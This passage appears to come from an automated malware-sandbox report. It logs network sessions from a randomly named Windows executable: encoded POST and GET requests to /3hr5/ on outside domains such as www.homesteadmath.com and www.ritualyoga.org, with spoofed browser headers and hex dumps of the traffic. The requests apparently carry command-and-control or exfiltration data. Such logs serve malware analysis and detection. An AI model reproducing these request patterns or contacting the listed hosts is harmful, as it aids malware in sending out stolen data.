6f 48 77 7a 2b 52 64 50 43 4c 76 41 52 44 6f 33 6a 55 46 48 2f 43 4e 4b 70 76 49 52 44 4b 37 4d 75 4f 4b 42 59 5a 67 45 47 7a 58 43 38 62 5a 2b 6f 5a 65 37 52 4c 4c 4e 4a 4e 42 4f 41 64 76 74 59 6e 32 45 52 69 6a 37 46 75 53 54 6e 41 49 36 31 39
                                                                                                                              Data Ascii: TZd=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
                                                                                                                              Dec 4, 2023 15:22:56.464566946 CET2626OUTData Raw: 6a 6c 7a 77 6c 54 54 66 5a 42 38 59 59 69 41 54 49 33 4c 71 33 43 6c 76 56 6b 68 6f 48 35 38 6b 52 6e 75 2f 72 37 4c 41 33 6d 6e 57 33 78 77 56 46 2b 7a 70 78 6c 45 4a 64 74 35 6c 41 49 33 4e 64 57 46 77 50 50 65 36 46 52 71 77 67 56 2b 50 44 74
                                                                                                                              Data Ascii: jlzwlTTfZB8YYiATI3Lq3ClvVkhoH58kRnu/r7LA3mnW3xwVF+zpxlEJdt5lAI3NdWFwPPe6FRqwgV+PDt1UtGemmPTk96wov9GXD+2VVdIC3XvB952g38vn9TPtkZJNsgA0UrnyLF4ifkw16MQur+JW4RGdvA4Maenks/vj4K6Ri95cLvHQNKJzv0mRjIEGPKBKwMtWO/8KcWIFWLYASCZCug6KPs4576CsNEt6AvUHTExayLC
                                                                                                                              Dec 4, 2023 15:22:56.464786053 CET12914OUTData Raw: 39 64 65 4a 64 4a 7a 5a 68 33 61 43 6f 66 54 37 4a 31 68 30 37 49 6f 4a 72 33 51 4e 6b 65 5a 4c 6c 34 50 36 69 67 79 58 47 37 6e 38 6c 76 63 30 76 39 65 34 69 4f 6a 64 6a 2b 57 74 57 66 6d 33 43 4f 69 78 53 6c 4d 4f 54 78 77 75 71 69 6a 6b 6b 42
                                                                                                                              Data Ascii: 9deJdJzZh3aCofT7J1h07IoJr3QNkeZLl4P6igyXG7n8lvc0v9e4iOjdj+WtWfm3COixSlMOTxwuqijkkBxwgRV89IQHGJHKkzx9tOUJsVbgO7nAPz9hi+LqFDm0k112FVikShVX5nV6ZNii14wFEg2FQcyKop3SdH16oxulvq7gxeaJDUFBhdRRB0My8yERUtVOdwl/qSfGVOLY0tpV4lGFQkLd+D9/xOAZ8KniV5uvXsc+k6W
                                                                                                                              Dec 4, 2023 15:22:56.464947939 CET2626OUTData Raw: 77 6c 78 74 54 4d 6b 6f 39 77 42 49 79 45 53 46 32 7a 52 48 79 2b 38 45 56 4a 54 4b 58 64 64 69 35 69 6a 75 79 33 78 33 5a 6b 31 5a 65 4c 2b 45 7a 6e 65 74 63 46 75 53 56 53 44 61 77 42 77 5a 4c 51 41 67 62 43 50 5a 4c 4a 54 6b 39 74 74 6d 42 74
                                                                                                                              Data Ascii: wlxtTMko9wBIyESF2zRHy+8EVJTKXddi5ijuy3x3Zk1ZeL+EznetcFuSVSDawBwZLQAgbCPZLJTk9ttmBtZCcSM/IlVaxMv7MX+Cqe/gAdKbpwZ+nOcR3A5a1GmMyMPtkYd5tqdivDkGWONy9p1RCby+pCbIIkaVuHjEWIwJ1M4N7c1hw1Ww9BfuILMTdEQ9TVuBsPeQYGtFszQYcEY39S6p2N+gGLIau5mKWLcHrnl0OYOtf1R
                                                                                                                              Dec 4, 2023 15:22:56.465219021 CET7770OUTData Raw: 66 34 44 6e 78 63 33 4a 33 41 68 62 66 59 6a 45 5a 64 50 79 31 52 2f 39 38 6d 4d 2f 6e 37 74 35 38 59 78 7a 62 54 50 52 4e 4a 41 35 48 32 2f 75 46 72 79 31 55 4e 69 6e 76 44 46 6f 50 65 6c 6a 5a 6d 52 68 6a 38 44 6b 34 45 4d 61 6a 31 47 47 4e 35
                                                                                                                              Data Ascii: f4Dnxc3J3AhbfYjEZdPy1R/98mM/n7t58YxzbTPRNJA5H2/uFry1UNinvDFoPeljZmRhj8Dk4EMaj1GGN5vS1RLqTgB01rG9gM8hDQO87CasmGp/AR08ULyp1cEVrddrv19o6rpXXT+FvBozYbahZOHZ4YekFOr7+14PRj+uQqruGikdUzRT7akMFgaJ5gmmxt4m7rjzGtLLa3WP1XhbCi5edAjIPMqMWJZFXrYTIIoJaImjSvj
                                                                                                                              Dec 4, 2023 15:22:56.588649988 CET1340OUTData Raw: 37 6d 70 33 42 38 32 49 32 4e 51 7a 33 6d 38 77 72 43 54 33 31 76 52 47 4b 41 55 6f 73 6c 31 51 66 53 6f 6f 56 47 30 43 32 56 67 74 64 51 62 61 6f 36 48 36 7a 62 4f 66 4e 32 64 54 34 41 48 6f 76 56 42 6d 55 34 70 6a 4c 57 4f 4c 74 49 50 64 47 6b
                                                                                                                              Data Ascii: 7mp3B82I2NQz3m8wrCT31vRGKAUosl1QfSooVG0C2VgtdQbao6H6zbOfN2dT4AHovVBmU4pjLWOLtIPdGkh7kI4HswGBqW9ZTnZv82/He7bkXwX8tFoxpSdHNNRUr3mI0VqJjDx7+rDqS1kSbAQ5l4kSt5yJ5o0u4PU3Q/XtQBpRWX6tv9Zd26XJUoFJC6ekBylGvAFOhUEuJYo1ur64kXkAwVPTiCNLFsV2EMuNnliTU5F+2no
                                                                                                                              Dec 4, 2023 15:22:56.588710070 CET3912OUTData Raw: 50 64 4b 37 45 36 46 57 32 65 2f 37 2b 58 37 76 51 4c 65 4c 34 79 6a 4b 49 71 37 65 63 64 6d 69 6f 4c 51 6f 62 55 4b 6c 50 37 66 67 32 4b 41 79 77 7a 46 6b 4c 4e 41 78 67 6d 52 44 66 50 6c 65 6f 48 36 6e 73 75 2b 7a 6e 36 44 30 43 70 6e 53 45 30
                                                                                                                              Data Ascii: PdK7E6FW2e/7+X7vQLeL4yjKIq7ecdmioLQobUKlP7fg2KAywzFkLNAxgmRDfPleoH6nsu+zn6D0CpnSE0mnzgS5IQyijHbAmXZ/OZJPU3DESn8MUxcji2e5gOVHqqfrtTjK5iEtoPE8ASU6BSoUFPcPWmVgFoBMZ7dC9ppu/RcTkgkF40lYLVqpcUF68TvKPtPfgxg8sHpo5PXgrbHoBWifADnX4+G7sMry5XPCsQIcmmy8DVL
                                                                                                                              Dec 4, 2023 15:22:56.588932037 CET9822OUTData Raw: 77 78 50 42 6d 6f 65 67 62 37 63 39 6f 48 35 5a 30 58 33 47 69 38 63 47 6c 32 42 6e 78 65 4a 58 32 31 67 69 65 76 65 56 35 62 68 43 50 41 6e 50 58 58 75 35 33 38 45 31 55 36 34 71 35 4d 56 38 79 43 44 59 73 48 5a 35 65 35 77 2f 52 6c 6b 4a 49 68
                                                                                                                              Data Ascii: wxPBmoegb7c9oH5Z0X3Gi8cGl2BnxeJX21gieveV5bhCPAnPXXu538E1U64q5MV8yCDYsHZ5e5w/RlkJIhKGo3cWTs75G6Dj49Ew/65rp67aVBAs9W/FR9JmCTsDfu0VxzguY74ZbAwTTK/gWrTr7Ta/L5jGnJHmvaemtWg6pPHYi3xM3oU4TmWLOVV8Pj3LemaDk0YlAxZvBdI7XptWEBFF28UEJSXOeMutmBzh3J01hM0GP+s
                                                                                                                              Dec 4, 2023 15:22:56.715848923 CET634INHTTP/1.1 404 Not Found
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Date: Mon, 04 Dec 2023 14:22:56 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              4192.168.11.205013574.208.236.243808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:22:58.994398117 CET535OUTGET /3hr5/?TZd=C7q+sjkOjeHdW4KfX5XkOV+bb3qVpxl3Mz3wz487ZoyHEt9a0wBYazkTJk6RHURF+VscnNPsgG//B6D/+agfmiMJ8iKN4XKnaw==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.homesteadmath.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:22:59.122128010 CET824INHTTP/1.1 404 Not Found
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 626
                                                                                                                              Connection: close
                                                                                                                              Date: Mon, 04 Dec 2023 14:22:59 GMT
                                                                                                                              Server: Apache
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              5192.168.11.2050136216.40.34.41808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:23:12.728913069 CET807OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.ritualyoga.org
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.ritualyoga.org
                                                                                                                              Referer: http://www.ritualyoga.org/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 6f 47 2b 4f 4e 63 4b 67 63 4d 31 59 4b 6c 77 74 2b 31 42 77 65 67 4f 63 62 4e 74 54 37 66 4a 62 4f 54 33 34 66 6e 30 48 79 49 75 61 69 55 48 69 44 42 43 33 4c 64 6a 77 69 6c 42 4e 7a 41 2b 41 58 67 2f 74 67 58 2f 5a 39 4a 5a 75 72 6a 54 6d 51 35 62 77 6f 4d 7a 56 72 79 6d 52 77 75 70 49 2f 54 76 54 68 38 76 79 4e 4b 43 7a 36 52 47 52 41 4f 41 37 6d 49 2b 45 30 57 38 7a 52 61 34 69 56 77 4a 52 79 62 6f 6f 69 6d 69 57 30 2f 70 6c 63 75 31 58 55 66 58 31 53 4e 43 4f 2f 36 69 56 64 52 7a 2b 76 38 6d 66 50 53 75 66 46 59 36 73 38 41 3d 3d
                                                                                                                              Data Ascii: TZd=oG+ONcKgcM1YKlwt+1BwegOcbNtT7fJbOT34fn0HyIuaiUHiDBC3LdjwilBNzA+AXg/tgX/Z9JZurjTmQ5bwoMzVrymRwupI/TvTh8vyNKCz6RGRAOA7mI+E0W8zRa4iVwJRybooimiW0/plcu1XUfX1SNCO/6iVdRz+v8mfPSufFY6s8A==
                                                                                                                              Dec 4, 2023 15:23:12.870420933 CET1328INHTTP/1.1 404 Not Found
                                                                                                                              server: nginx/1.14.2
                                                                                                                              date: Mon, 04 Dec 2023 14:23:12 GMT
                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                              transfer-encoding: chunked
                                                                                                                              x-request-id: 958a918b-9862-4cf0-b51a-9d975ac6c37d
                                                                                                                              x-runtime: 0.027786
                                                                                                                              content-encoding: gzip
                                                                                                                              connection: close
                                                                                                                              Data Raw: 31 33 39 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 5c 6d 53 db c6 b7 7f 9f 4f b1 7f 33 b7 36 0d 96 1f 08 04 08 a6 e3 82 21 b4 09 e4 1a 27 4d 9b c9 b8 b2 b5 b6 55 64 c9 95 64 0c e9 ed 77 bf bf 73 76 57 5a d9 40 28 f4 be b8 33 09 93 46 48 bb e7 f9 69 77 cf 76 ff 3f 47 e7 87 bd 5f df 75 c4 24 9d 06 07 cf f6 e9 1f 11 b8 e1 b8 55 92 61 89 5e 48 d7 3b 78 26 c4 fe 54 a6 ae 18 4e dc 38 91 69 ab 34 4f 47 d5 9d 92 a8 f1 a7 d4 4f 03 79 d0 1e a6 7e 14 8a c3 28 4c e3 28 08 64 bc 27 3a d7 43 39 e3 b7 43 77 3e 9e a4 fb 35 35 94 26 25 e9 0d 26 e1 49 88 41 e4 dd 88 bf f8 11 bf b8 c3 cb 71 1c cd 43 af 3a 8c 82 08 50 d6 8e db f4 f3 4a 0f 30 6f 37 37 37 cd ab a9 1b 8f fd 70 4f d4 67 d7 ea d5 df cf 32 c0 1b 62 b6 21 a2 60 43 cc f1 37 f5 32 3c 23 d0 59 1d b9 53 3f b8 d9 13 13 19 5c c9 d4 1f ba 1b e2 4a c6 9e 1b e2 c1 8d 7d 17 53 12 37 4c aa 89 8c fd 91 c1 c6 33 13 ff 8b dc 03 b9 8d 4d 83 53 88 c0 0f 65 75 22 7d 70 ba 27 1a 3b 4b c4 cc 62 59 44 ae 40 34 1a 39 80 c5 c4 4f 65 35 99 b9 43 c0 c6 f8 ea 22 76 67 05 8e f0 d2 19 44 d7 b9 b4 a2 d8 23 49 03 88 48 a2 c0 f7 c4 5a a7 d3 31 94 ce 5c cf f3 c3 31 3e 67 92 11 62 45 58 42 2c 7c 2f 9d ec 89 dd ad 65 9a 49 fb 32 ce b0 65 0a a9 1f e3 c7 60 c9 35 06 5d 1d 6e 35 8f 9b 2f 56 08 a8 3b 5b 72 2a 1a f4 df 02 3f 93 46 06 3c a3 cb 69 62 68 06 bd 28 54 a7 61 00 08 61 e9 01 33 8a 60 9b 2b 34 17 09 2b 40 6d 6e 2d a9 ca f1 60 ec 7e 90 dc 27 e6 a3 3a fd 64 32 60 3d 54 63 d7 f3 e7 c9 9e 78 91 eb d4 b0 05 c2 73 fb 14 c2 f3 93 59 e0 c2 f4 06 41 34 bc 34 60 8c 22 5e 2e 2b c2 49 e6 53 40 ca dd 24 53 2d 46 8a 46 c6 00 39 13 53 32 88 d2 34 9a 16 0c a3 48 f1 6d 04 68 b7 c9 d8 b7 4d d6 f0 b1 82 6a 4f 84 51 28 0b e2 5f 1b c2 45 5c 78 43 6e 3a 30 5a f2 19 b6 c6 8c 44 ed ad 99 01 36 ea f5 ff 5a 35 9d 5b cc c6 49 a2 79 3c 94 e2 fb 55 eb c9 25 9f 89 68 39 2c 98 d9 7f 99 90 b3 ea 44 47 bb f4 93 69 37 8b 49 b0 f0 ce 21 fd 3c 40 63 8a 44 5b 86 05 7f b4 ad 41 49 e4 16 49 1a 52 1d cf 45 f8 35 04 5b 96 bf 93 4b 2c 42 e8 1a 05 d1 62 4f b8 f3 34 5a a5 3d 8f a7 c7 c7 05 75 39 7e 38 8a 32 e0 b9 d8 56 bc b5 48 8d 43 4e d4 0f e7 d3 81 8c 2d 57 59 8d df 45 89 99 20 d2 6e 67 21 3d 97 0b 9c 24 c7 9a 19 73 ac 43 6a 1e e4 8e 8e 8e 0c 83 a9 bc 4e ab 6e e0 8f 91 00 78 60 91 37 22 72 99 b7 6a 20 47 14 a2 ad a8 b8 1c 7a 57 81 ec 4d 48 c0 79 48 58 e5 f3 78 9b 7e 56 67 3a 2e 52 e3 55 4e c5 6d 29 ee f8 10 7f 8a 53 27 be e7 c9 30 43 98 39 ec 8a bb c1 30 84 91 ea ee 4e 7d b7 be f5 4a fc cd b6 ed ee 5d f9 09 72 0a d2 5e 36 62 7b 7b 3b fb ec a4 31 72 4d 75 14 bb 53 09 15 de 3a c6 f0 9d 7d d4 91 d4 a0 28 c0 70 12 19 c8 61 11 a1 1a 8f e1 da dd d6 90 dd 53 d9 4f dd 41 60 64 92 c5 7e 25 01 1d 20 c0 53 e0 ce 12 e4 42 f3 44 9f 19 4e 01 46 4a 69 4a a4 46 37 4b 11 b0 99 5b 8d e7 79 f7 43 40 6e a5 b0 a9 65 be 04 c8 c8 fd 6e 02 cc f4 74 a2 21 2c 39 bc e2 ae 98 d1 74 3c 7d 10 50 3f 9c cd d3 b5 44 